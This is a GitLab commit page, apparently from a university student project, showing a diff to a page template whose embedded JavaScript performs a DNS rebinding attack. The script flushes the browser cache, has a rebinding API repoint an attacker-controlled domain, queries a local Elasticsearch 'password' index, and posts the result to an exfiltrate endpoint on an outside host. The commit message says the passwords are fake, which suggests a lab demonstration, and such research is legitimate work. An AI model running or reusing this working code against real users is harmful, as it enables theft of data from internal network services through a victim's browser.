Ce serveur Gitlab sera éteint le 30 juin 2020, pensez à migrer vos projets vers les serveurs gitlab-research.centralesupelec.fr et gitlab-student.centralesupelec.fr !

Commit 03b4b020 authored by Tabet Sami's avatar Tabet Sami

Merge branch 'sami/request-es-data-instead-of-es-status' into 'master'

feat: Request ES data (fake passwords) instead of ES status URI

See merge request !15
parents cd235ed7 fb2b4bd4
......@@ -13,10 +13,11 @@
<script charset="utf-8">
(async () => {
const ID = "{{ .ID }}"
const API = `${ID}.my.ip.paulcoignet.fr`;
const NDD = `my.ip.paulcoignet.fr`;
const API = `${ID}.${NDD}`;
const FLUSH = `${ID}.flush.my.ip.paulcoignet.fr`;
const port = 8080;
const url = `http://${API}:${port}/`;
const url = `http://${API}:${port}`;
// From: https://github.com/nccgroup/singularity/blob/8313182a2a6573b7ebe3243d77f70cf409d7d566/html/payload.js#L38
async function flush() {
......@@ -34,9 +35,9 @@
);
}
async function request(uri, port) {
async function request() {
try {
const data = await fetch(`http://${API}:${port}/${uri}`);
const data = await fetch(`${url}/password/_search?pretty=true&q=*:*`);
const txt = await data.text();
return txt;
} catch (e) {
......@@ -46,7 +47,7 @@
async function rebind(rebindTTL) {
try {
const data = await fetch(`http://${API}:8080/api/rebind`, {
const data = await fetch(`${url}/api/rebind`, {
method: "POST",
body: JSON.stringify({
ndd: `${API}.`,
......@@ -65,7 +66,7 @@
async function exfiltrate(data) {
try {
return fetch(`http://${API}:8080/api/exfiltrate`, {
return fetch(`http://${NDD}:${port}/api/exfiltrate`, {
method: "POST",
body: data
});
......@@ -84,19 +85,12 @@
await flush();
console.log("Request locally");
const res = await request("", 8080);
const res = await request();
console.log("response", res);
console.log("Second flush");
const flushing = flush();
// Wait for the flush to end and the rebind to expire
setTimeout(async function() {
await flushing;
// Wait for the rebind to expire
console.log(await exfiltrate(res));
console.log("done exfiltrating");
}, 1.1 * rebindTTL * 1000);
// Wait for the rebind to expire
console.log(await exfiltrate(res));
console.log("done exfiltrating");
})();
</script>
......
......@@ -72,9 +72,7 @@
<td>{{ $ex.ID }}</td>
<td>{{ $ex.Data }}</td>
</tr>
{{
end
}}
{{ end }}
</table>
</body>
</html>
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment